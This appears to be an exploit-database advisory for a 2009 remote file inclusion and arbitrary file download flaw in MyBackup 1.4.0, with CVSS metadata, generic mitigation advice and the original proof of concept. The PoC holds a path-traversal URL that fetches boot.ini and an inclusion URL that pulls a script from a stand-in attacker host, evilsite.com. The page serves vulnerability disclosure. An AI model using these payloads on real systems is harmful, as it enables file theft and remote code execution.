MyBackup 1.4.0 Remote File Inclusion (AFD/RFI) Multiple Remote Vulnerabilities

vendor:

MyBackup

by:

SirGod

9,3

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: MyBackup

Affected Version From: 1.4.0

Affected Version To: 1.4.0

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

MyBackup 1.4.0 Remote File Inclusion (AFD/RFI) Multiple Remote Vulnerabilities

MyBackup 1.4.0 is vulnerable to Remote File Inclusion (RFI) and Arbitrary File Download (AFD) attacks. An attacker can exploit this vulnerability by sending a malicious URL to the application. The malicious URL can be used to download arbitrary files from the server or to execute malicious code on the server.

Mitigation:

To mitigate this vulnerability, the application should validate all user input and filter out any malicious URLs. Additionally, the application should be configured to only allow access to trusted domains.

Source

Exploit-DB raw data:

###############################################################################################
[+] MyBackup 1.4.0  Remote File Inclusion (AFD/RFI) Multiple Remote Vulnerabilities
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
################################################################################################

[+] Download Script : http://www.tufat.com/files_lgpl/script_96.zip

[+] Arbitrary File Download

 - PoC

     http://127.0.0.1/down.php?filename=../../../../../../boot.ini

[+] Remote File Inclusion

 - You must be logged in.

     http://127.0.0.1/index.php?main_tabid=1&main_content=http://evilsite.com/evilscript.txt

################################################################################################

# milw0rm.com [2009-08-05]